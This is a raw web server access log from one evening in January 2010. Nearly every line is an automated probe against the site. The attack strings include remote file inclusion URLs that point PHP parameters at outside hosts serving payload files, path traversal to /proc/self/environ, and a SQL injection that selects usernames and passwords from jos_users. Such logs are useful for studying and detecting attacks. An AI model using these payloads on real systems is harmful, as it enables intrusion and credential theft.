222.234.2.95 - - [24/Jan/2010:19:47:36 -0800] "GET /logs/access.log/head.php?path=http://www.sinhan.net/zeroboard41/data/board/1097820351//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:19:51:23 -0800] "GET ///board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:19:51:23 -0800] "GET /logs/access.log////board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:19:51:23 -0800] "GET /logs////board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.234.200.104 - - [24/Jan/2010:20:03:36 -0800] "GET /logs/access_091228.log/index.php?lg=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.galf.org"
200.234.200.104 - - [24/Jan/2010:20:03:36 -0800] "GET /index.php?lg=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.galf.org"
200.234.200.104 - - [24/Jan/2010:20:03:36 -0800] "GET /logs/access.log/index.php?lg=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "galf.org"
200.234.200.104 - - [24/Jan/2010:20:03:36 -0800] "GET /index.php?lg=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "galf.org"
200.234.200.104 - - [24/Jan/2010:20:03:36 -0800] "GET /logs/access_091228.log/index.php?lg=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.galf.org"
200.234.200.104 - - [24/Jan/2010:20:03:36 -0800] "GET /index.php?lg=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.galf.org"
200.234.200.104 - - [24/Jan/2010:20:03:36 -0800] "GET /index.php?lg=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "galf.org"
200.234.200.104 - - [24/Jan/2010:20:03:36 -0800] "GET /logs/access.log/index.php?lg=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "galf.org"
94.124.120.47 - - [24/Jan/2010:20:05:38 -0800] "GET /logs//administrator/components/com_virtuemart/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 - "-" "Advanced Browser (http://www.avantbrowser.com)" "www.galf.org"
94.124.120.47 - - [24/Jan/2010:20:05:38 -0800] "GET /administrator/components/com_virtuemart/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 - "-" "Advanced Browser (http://www.avantbrowser.com)" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:20:09:37 -0800] "GET /logs/access_091005.log//index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:20:09:37 -0800] "GET /logs//index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:20:09:37 -0800] "GET /index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:20:09:53 -0800] "GET /logs/access_091005.log//index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:20:09:53 -0800] "GET /index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:20:09:53 -0800] "GET /logs//index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:20:09:58 -0800] "GET /logs/access_091005.log//index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:20:09:58 -0800] "GET /index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:20:09:58 -0800] "GET /logs//index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:20:10:10 -0800] "GET /logs/access_091005.log//index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:20:10:10 -0800] "GET /logs//index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:20:10:10 -0800] "GET /index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:20:10:14 -0800] "GET /logs/access_091005.log//index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:20:10:14 -0800] "GET /index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:20:10:14 -0800] "GET /logs//index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:20:12:47 -0800] "GET /logs/access_091005.log//index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:20:12:47 -0800] "GET /index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:20:12:47 -0800] "GET /logs//index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:20:12:52 -0800] "GET /logs/access_091005.log//index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:20:12:52 -0800] "GET /index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:20:12:52 -0800] "GET /logs//index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.125.126.97 - - [24/Jan/2010:20:13:03 -0800] "GET /logs/access_091221.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pymexpo.org/skins/com/tool/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.125.126.97 - - [24/Jan/2010:20:13:03 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pymexpo.org/skins/com/tool/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.125.126.97 - - [24/Jan/2010:20:13:03 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pymexpo.org/skins/com/tool/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.125.126.97 - - [24/Jan/2010:20:13:16 -0800] "GET /logs/access_090817.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pymexpo.org/skins/com/tool/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
180.68.206.20 - - [24/Jan/2010:20:13:18 -0800] "GET /logs/access_091026.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.theworldleague.net//modules/Forums/admin/language/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
180.68.206.20 - - [24/Jan/2010:20:13:27 -0800] "GET /logs/access_091130.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.theworldleague.net//modules/Forums/admin/language/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
180.68.206.20 - - [24/Jan/2010:20:13:31 -0800] "GET /logs/access_090803.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.theworldleague.net//modules/Forums/admin/language/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
180.68.206.20 - - [24/Jan/2010:20:13:31 -0800] "GET /logs/access_091005.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.theworldleague.net//modules/Forums/admin/language/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
180.68.206.20 - - [24/Jan/2010:20:13:31 -0800] "GET /logs/access_090720.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.theworldleague.net//modules/Forums/admin/language/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
180.68.206.20 - - [24/Jan/2010:20:13:53 -0800] "GET /logs/access_090824.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.theworldleague.net//modules/Forums/admin/language/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
180.68.206.20 - - [24/Jan/2010:20:13:57 -0800] "GET /logs/access_090831.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.theworldleague.net//modules/Forums/admin/language/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
180.68.206.20 - - [24/Jan/2010:20:13:57 -0800] "GET /logs/access_090907.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.theworldleague.net//modules/Forums/admin/language/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:20:14:13 -0800] "GET /logs/access_091005.log//index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:20:14:13 -0800] "GET /index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:20:14:13 -0800] "GET /logs//index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.250.252.242 - - [24/Jan/2010:20:14:37 -0800] "GET /logs/access_100118.log HTTP/1.1" 200 7015505 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:20:16:21 -0800] "GET /index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:20:16:21 -0800] "GET /logs//index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:20:16:21 -0800] "GET /logs/access_090907.log%20%20//index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:20:16:24 -0800] "GET /index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:20:16:24 -0800] "GET /logs//index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.77.228.201 - - [24/Jan/2010:20:16:24 -0800] "GET /logs/access_090907.log%20%20//index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.149.110.210 - - [24/Jan/2010:20:16:59 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
83.149.110.210 - - [24/Jan/2010:20:16:59 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
83.149.110.210 - - [24/Jan/2010:20:16:59 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
115.68.3.94 - - [24/Jan/2010:20:17:35 -0800] "GET /logs/access_091207.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.68.3.94 - - [24/Jan/2010:20:17:35 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.52.253.151 - - [24/Jan/2010:20:18:06 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.galf.org"
72.52.253.151 - - [24/Jan/2010:20:18:06 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.galf.org"
74.55.15.194 - - [24/Jan/2010:20:19:33 -0800] "GET /logs/index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999/**/union/**/select/**/concat(username,0%D73a,password)/**/from/**/jos_users/* HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
74.55.15.194 - - [24/Jan/2010:20:19:34 -0800] "GET /index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999/**/union/**/select/**/concat(username,0%D73a,password)/**/from/**/jos_users/* HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
74.55.15.194 - - [24/Jan/2010:20:19:34 -0800] "GET /logs/access_090720.log/index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999/**/union/**/select/**/concat(username,0%D73a,password)/**/from/**/jos_users/* HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
74.55.15.194 - - [24/Jan/2010:20:19:36 -0800] "GET /logs/access_091116.log/index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999/**/union/**/select/**/concat(username,0%D73a,password)/**/from/**/jos_users/* HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
69.73.144.187 - - [24/Jan/2010:20:20:13 -0800] "GET /index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999/**/union/**/select/**/concat(username,0%D73a,password)/**/from/**/jos_users/*' HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
115.68.3.94 - - [24/Jan/2010:20:20:32 -0800] "GET /logs/access_091221.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.52.253.151 - - [24/Jan/2010:20:21:15 -0800] "GET /logs//errors.php?error=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.galf.org"
72.52.253.151 - - [24/Jan/2010:20:21:15 -0800] "GET /errors.php?error=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.galf.org"
69.73.144.187 - - [24/Jan/2010:20:21:30 -0800] "GET /index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999/**/union/**/select/**/concat(username,0%D73a,password)/**/from/**/jos_users/*' HTTP/1.1" 404 - "-" "libwww-perl/5.831" "galf.org"
69.73.144.187 - - [24/Jan/2010:20:23:09 -0800] "GET /logs/access_090720.log/index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999/**/union/**/select/**/concat(username,0%D73a,password)/**/from/**/jos_users/*' HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
69.73.144.187 - - [24/Jan/2010:20:23:09 -0800] "GET /index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999/**/union/**/select/**/concat(username,0%D73a,password)/**/from/**/jos_users/*' HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
69.73.144.187 - - [24/Jan/2010:20:23:09 -0800] "GET /logs/index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999/**/union/**/select/**/concat(username,0%D73a,password)/**/from/**/jos_users/*' HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
116.125.126.97 - - [24/Jan/2010:20:23:53 -0800] "GET /logs/access_091221.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pymexpo.org/skins/com/tool/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.125.126.97 - - [24/Jan/2010:20:25:00 -0800] "GET /logs/access_090817.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.pymexpo.org/skins/com/tool/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.113.224 - - [24/Jan/2010:20:25:04 -0800] "GET /tmp/?D=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
85.25.26.87 - - [24/Jan/2010:20:25:59 -0800] "GET /logs//?p=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 200 4804 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.galf.org"
85.25.26.87 - - [24/Jan/2010:20:25:59 -0800] "GET /?p=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.galf.org"
69.73.144.187 - - [24/Jan/2010:20:27:45 -0800] "GET /logs/access_091116.log/index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999/**/union/**/select/**/concat(username,0%D73a,password)/**/from/**/jos_users/*' HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
121.101.214.54 - - [24/Jan/2010:20:29:14 -0800] "GET /logs//gnuboard4/bbs/write_update.php?board_skin_path=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [24/Jan/2010:20:29:14 -0800] "GET /gnuboard4/bbs/write_update.php?board_skin_path=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [24/Jan/2010:20:29:14 -0800] "GET /logs/access.log%20%20//gnuboard4/bbs/write_update.php?board_skin_path=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.140.83.66 - - [24/Jan/2010:20:34:05 -0800] "GET ///bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.140.83.66 - - [24/Jan/2010:20:34:05 -0800] "GET /logs////bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.140.83.66 - - [24/Jan/2010:20:34:05 -0800] "GET /logs/access.log////bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.140.83.66 - - [24/Jan/2010:20:34:39 -0800] "GET /logs////bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.140.83.66 - - [24/Jan/2010:20:34:39 -0800] "GET ///bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.140.83.66 - - [24/Jan/2010:20:34:39 -0800] "GET /logs/access.log////bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.140.83.66 - - [24/Jan/2010:20:36:33 -0800] "GET ///bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.140.83.66 - - [24/Jan/2010:20:36:33 -0800] "GET /logs/access.log////bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.140.83.66 - - [24/Jan/2010:20:36:33 -0800] "GET /logs////bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.140.83.66 - - [24/Jan/2010:20:39:28 -0800] "GET /logs////bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.140.83.66 - - [24/Jan/2010:20:39:28 -0800] "GET /logs/access.log%20%20////bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.140.83.66 - - [24/Jan/2010:20:39:28 -0800] "GET ///bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [24/Jan/2010:20:39:39 -0800] "GET ////write_update.php?board_skin_path=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [24/Jan/2010:20:39:39 -0800] "GET /logs/access.log%20%20/////write_update.php?board_skin_path=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [24/Jan/2010:20:39:39 -0800] "GET /logs/////write_update.php?board_skin_path=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [24/Jan/2010:20:40:32 -0800] "GET /logs/access.log//gnuboard4/bbs/write_update.php?board_skin_path=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.140.83.66 - - [24/Jan/2010:20:41:22 -0800] "GET /logs////bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.140.83.66 - - [24/Jan/2010:20:41:22 -0800] "GET /logs/access.log%20%20////bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.140.83.66 - - [24/Jan/2010:20:41:22 -0800] "GET ///bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [24/Jan/2010:20:51:28 -0800] "GET /logs/access.log/////write_update.php?board_skin_path=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.125.126.97 - - [24/Jan/2010:20:53:54 -0800] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://www.pymexpo.org/skins/com/tool/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
116.125.126.97 - - [24/Jan/2010:20:53:54 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.pymexpo.org/skins/com/tool/fxd? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "galf.org"
116.125.126.97 - - [24/Jan/2010:20:53:54 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.pymexpo.org/skins/com/tool/fxd? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "galf.org"
121.101.214.54 - - [24/Jan/2010:20:55:31 -0800] "GET /logs////bbs/write_update.php?board_skin_path=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [24/Jan/2010:20:55:31 -0800] "GET ///bbs/write_update.php?board_skin_path=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
